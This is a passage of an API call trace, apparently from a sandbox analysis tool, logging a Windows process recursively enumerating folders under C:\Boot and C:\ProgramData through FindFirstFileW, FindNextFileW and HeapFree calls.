hHeap=0x1db0000) returned 1 [0111.577] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.578] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.578] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.578] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.579] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.579] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.579] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.579] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.579] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.579] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.580] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.580] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.580] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.580] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.580] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.580] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.580] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.580] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.580] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.581] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.582] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.582] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.582] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.582] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.582] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.582] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.582] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.582] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.583] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.583] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.583] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.595] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.595] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.595] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.595] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.595] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.595] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.595] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.595] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.596] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.596] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.596] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.596] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.597] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.597] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.597] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.597] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.597] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.597] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.597] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.597] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.598] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.598] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.598] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.598] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.598] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.598] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.599] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.599] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.599] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.599] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.762] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.762] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.762] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.762] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.762] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0 [0111.762] FindClose (in: hFindFile=0x29c0a0 | out: hFindFile=0x29c0a0) returned 1 [0111.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.763] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.763] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.763] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0111.763] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.764] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0111.764] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0111.765] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0111.765] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0x29c0a0 [0111.765] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.765] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.800] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.800] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0111.800] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.800] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.800] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.800] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0111.801] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.801] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0111.801] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.801] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.801] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0 [0111.801] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.801] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0111.801] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0 [0111.801] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.802] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.803] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.803] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.803] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0111.803] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0111.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.803] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0111.804] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.804] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.904] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.904] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.904] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.904] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.904] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.904] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.904] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.904] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0111.904] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0111.904] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0111.906] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.906] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.906] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.906] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0111.906] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.906] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0111.906] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.906] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0111.906] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.906] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0111.907] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.907] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.907] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.907] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0111.907] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.907] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.908] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.908] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0111.908] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.908] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.909] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0111.910] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.910] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.910] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0111.911] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0 [0111.911] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.912] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.912] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0 [0111.912] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.912] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.912] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.912] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.912] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.912] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0111.912] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0111.912] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0111.913] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0111.914] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | 